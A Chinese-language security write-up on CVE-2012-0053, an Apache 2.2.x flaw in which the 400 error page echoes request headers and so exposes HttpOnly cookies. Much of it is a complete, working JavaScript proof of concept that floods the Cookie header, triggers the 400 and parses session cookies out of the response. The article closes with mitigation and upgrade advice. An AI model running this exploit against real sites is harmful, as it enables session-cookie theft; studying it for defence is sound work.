很多程序以及一些商业或成熟开源的 CMS 文章系统，为了防止 XSS 盗取用户 Cookie，一般都会给会话 Cookie 加上 HttpOnly 属性，禁止 JS 通过 document.cookie 直接读取，从而降低 XSS 的危害。而下面这个问题刚好可以用来绕过 HttpOnly：HttpOnly 只挡住了 document.cookie 这一条读取路径，并不影响浏览器在发 XHR 时自动带上全部 Cookie；如果服务端（这里是旧版 Apache 2.2.x）在返回 400 错误页时把原始请求头原样回显出来，已经能在页面里执行 JS 的攻击者（也就是已经有了一个 XSS 点）就能从响应正文里把带 HttpOnly 的 Cookie 读回来。

复现步骤：用 Chrome 打开一个目标站点（需要是受影响的 Apache 版本，并且你已能在该站点同源下执行 JS），按 F12 打开开发者工具，在 Console 中粘贴如下代码并回车：
// Source: http://www.exploit-db.com/exploits/18442/ -- Apache 2.2.x HttpOnly cookie disclosure via the 400 Bad Request error page (CVE-2012-0053)
/**
 * Plant (or expire) ten oversized padding cookies on the current origin.
 *
 * Each padding cookie is "xss<i>=" followed by 819 "x" characters. Ten of
 * them together push the browser's Cookie: request header past the server's
 * per-header size limit (presumably Apache's default LimitRequestFieldSize of
 * 8190 bytes -- the original PoC does not say, but 10 * 819 lands just over
 * it), so the next request to this origin is rejected with a 400 whose error
 * page, on vulnerable Apache builds, echoes the offending Cookie: line.
 *
 * @param {boolean} [good] - truthy: overwrite the same ten cookies with an
 *   already-past "expires=" date so the browser discards them (cleanup);
 *   falsy/omitted: plant them.
 *
 * Side effects: ten assignments to document.cookie. Names, value length,
 * count and path attributes are exactly those of the original PoC.
 */
function setCookies(good) {
    // 820 empty slots joined by "x" yields 819 x's.
    var padding = new Array(820).join("x");
    var expired = new Date(+new Date() - 1).toUTCString();
    var n;
    for (n = 0; n < 10; n++) {
        var name = "xss" + n;
        document.cookie = good
            ? name + "=;expires=" + expired + "; path=/;"
            : name + "=" + padding + ";path=/";
    }
}
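/**
 * Recover HttpOnly cookies from Apache's 400 "Bad Request" error page.
 *
 * Sequence: plant the oversized padding cookies (setCookies()), then GET "/"
 * over XHR. The browser attaches every cookie for this origin to that request
 * -- HttpOnly ones included; HttpOnly only hides them from document.cookie --
 * so the Cookie: header is now too long for the server. A vulnerable Apache
 * answers 400 and echoes the offending request headers inside <pre>...</pre>;
 * that echo is parsed, the padding cookies are expired again, and the result
 * is shown with alert().
 *
 * Globals used: document (via setCookies), XMLHttpRequest, alert; sibling
 * function setCookies() from this file. Responses other than a completed 400
 * are ignored -- nothing is alerted and the padding cookies stay planted, so
 * run setCookies(true) by hand in that case.
 *
 * Changes against the pasted PoC:
 *  - cookies.split(...) was called on the array rather than cookies[i]
 *    (TypeError on the first cookie); each segment is now split on its own.
 *  - content.length threw when the <pre> regex found nothing (match() yields
 *    null); no match now simply produces {}.
 *  - names are trimmed ("a=1; b=2" gives keys "a" and "b", not "a" and " b")
 *    and values keep everything after the first "=" instead of being cut by
 *    split("=", 2), so base64-style values containing "=" survive intact.
 */
function makeRequest() {
    setCookies();

    var xhr = new XMLHttpRequest();

    // Fires on every readyState change; only the completed 400 is of interest.
    function parseCookies() {
        if (xhr.readyState !== 4 || xhr.status !== 400) {
            return;
        }
        var cookie_dict = parseEchoedCookies(xhr.responseText);
        // Unset the padding cookies whether or not anything was recovered.
        setCookies(true);
        alert(JSON.stringify(cookie_dict));
    }

    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

/**
 * Parse the Cookie: line echoed inside <pre>...</pre> of the error page.
 *
 * @param {string} responseText - raw body of the 400 response.
 * @returns {Object} cookie name -> value. The xss<N> padding cookies planted
 *   by setCookies() are stripped first; an empty object is returned when the
 *   body holds no <pre> block. A segment without "=" maps to "".
 */
function parseEchoedCookies(responseText) {
    var cookie_dict = {};
    // Drop line breaks so one non-global regex can span the whole block.
    var found = String(responseText).replace(/\r|\n/g, "").match(/<pre>(.+)<\/pre>/);
    if (!found) {
        return cookie_dict;
    }
    var header = found[1].replace("Cookie: ", "");
    var segments = header.replace(/xss\d=x+;?/g, "").split(/;/g);
    for (var i = 0; i < segments.length; i++) {
        var pair = segments[i].trim();
        if (!pair) {
            continue; // empty piece left by a trailing ";" or a removed padding cookie
        }
        var eq = pair.indexOf("=");
        if (eq === -1) {
            cookie_dict[pair] = "";
        } else {
            cookie_dict[pair.slice(0, eq)] = pair.slice(eq + 1);
        }
    }
    return cookie_dict;
}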
// Entry point: runs as soon as the snippet is pasted. An alert() appears only
// when the server answers the XHR with a 400 whose body echoes the headers.
makeRequest();
如果服务器是受影响的 Apache 版本，你就会看到一个 alert，里面是从 400 错误页中解析出来的 Cookie（包括带 HttpOnly 属性的会话 Cookie）。原理：上面的代码先种下 10 个每个 819 字节的垃圾 Cookie，把浏览器自动附带的 Cookie 请求头撑到超过 Apache 的单个请求头长度上限（LimitRequestFieldSize，默认 8190 字节），Apache 因此返回 400；旧版本的 400 错误页会把出错的请求头（含完整的 Cookie 行）原样回显在 <pre> 里，脚本再从响应正文中把它解析出来，最后把垃圾 Cookie 设为过期清理掉。如果站点已经修复，XHR 同样会收到 400，但正文里不会再有 Cookie 内容。
原始脚本下载地址（作者 pilate 的 gist）：https://gist.github.com/pilate/1955a1c28324d4724b7b/download 。从论坛转载处复制时请核对 `cookies[i].split('=',2)` 这一行：转载版本常把 `[i]` 漏掉，会导致 TypeError，以 gist 原文为准。
修复方案：
Apache 官方的 ErrorDocument 指令提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message —— 输出一段简单的硬编码错误信息（不配置 ErrorDocument 时的默认行为；受影响版本回显请求头的正是这个内置页面）
2. output a customized message —— 输出一段自定义的文本信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
经测试，对于 400 错误只有方法 2 有效（返回包不再包含 Cookie 内容）。这大概是因为 400 发生在请求头解析阶段，Apache 此时不会再为错误页发起内部子请求或重定向（方法 3、4 依赖这一机制），只有内联的文本消息能直接返回。注意这只是缓解措施，不是根治。
Apache 配置示例（写在 httpd.conf 或对应的 vhost 配置中，修改后 reload）：
ErrorDocument 400 "security test"
当然，根本的修复是把 Apache 升级到已修补的版本（该问题对应 2.2.22 之前的 Apache 2.2.x，编号 CVE-2012-0053，参见下面的官方安全公告页面），ErrorDocument 只是临时缓解。另外别忘了：这类绕过的前提是站点本身已经存在 XSS，修掉 XSS 才是治本，HttpOnly 只是纵深防御中的一层。
参考：http://httpd.apache.org/security/vulnerabilities_22.html（Apache 2.2 官方漏洞列表，在页面中查找 CVE-2012-0053 / HttpOnly 的条目）